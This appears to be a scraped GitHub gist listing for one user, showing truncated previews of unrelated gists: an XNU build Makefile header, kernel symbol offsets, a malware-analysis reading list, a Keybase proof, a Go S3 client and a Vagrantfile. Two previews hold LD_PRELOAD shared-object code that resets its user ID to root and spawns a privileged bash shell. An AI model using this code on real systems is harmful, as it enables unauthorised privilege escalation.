# -*- mode: makefile;-*-
#
# Apple XNU build prep
# Jeremy C. Andrus
#
# This Makefile contains commands necessary to download
# and build the XNU kernel for macOS High Sierra through
# Mojave. It will not actually build XNU, but it will
# build and install all of the prerequisites.
#
This file has been truncated, but you can view the full file.
0000000000000000 A irq_stack_union
0000000000000000 A __per_cpu_start
0000000000004000 A init_tss
0000000000004000 A __per_cpu_user_mapped_start
0000000000007000 A exception_stacks
000000000000c000 A gdt_page
000000000000d000 A kaiser_scratch
000000000000d010 A spec_ctrl_pcp
000000000000d040 A kaiser_enabled_pcp
000000000000d080 A cpu_debug_store
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
static void hack() __attribute__((constructor));
void hack(){
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
@lucasallan
lucasallan / preload.c
Last active December 13, 2019 04:36
preload.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init(){
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
@lucasallan
lucasallan / malware.md
Created April 7, 2018 20:44 — forked from blackfist/malware.md
Recommended reading for malware analysis
  1. http://computer-forensics.sans.org/blog/2010/11/12/get-started-with-malware-analysis
  2. http://zeltser.com/malware-analysis-toolkit/
  3. http://zeltser.com/vmware-malware-analysis/
  4. http://computer-forensics.sans.org/blog/2010/10/11/3-phases-malware-analysis-behavioral-code-memory-forensics/
  5. BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection https://www.usenix.org/legacy/event/sec08/tech/full_papers/gu/gu.pdf
  6. Mining the Network Behavior of Bots http://isg.rhul.ac.uk/sullivan/pubs/tr/2009-12.pdf
  7. Behavioral Clustering of HTTP-Based Malware and Signature Generation Using Malicious Network Traces https://www.usenix.org/legacy/event/nsdi10/tech/full_papers/perdisci.pdf
  8. From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final127.pdf
  9. Obfuscation of executable code to improve resistance to static disassembly http://www.cs.arizona.edu/~debray/Pub

Keybase proof

I hereby claim:

  • I am lucasallan on github.
  • I am lucasa (https://keybase.io/lucasa) on keybase.
  • I have a public key ASALx1cBTDTtDeNmQ85Wv40BePGxdqerkX5uU27TTljZgwo

To claim this, I am signing this object:

@lucasallan
lucasallan / main.go
Created February 9, 2017 00:02 — forked from dragonfax/main.go
example Riak CS (s3 API) client using aws-sdk-go
package main
import (
"bytes"
"fmt"
"io/ioutil"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/credentials"
"github.com/aws/aws-sdk-go/service/s3"
@lucasallan
lucasallan / Vagrant
Created November 6, 2016 21:22
rkt vagrant
Vagrant.configure('2') do |config|
config.vm.box = "ubuntu/xenial64" # Ubuntu 16.04
# fix issues with slow dns http://serverfault.com/a/595010
config.vm.provider :virtualbox do |vb, override|
vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]
vb.customize ["modifyvm", :id, "--memory", "4096"]
vb.customize ["modifyvm", :id, "--cpus", "4"]
end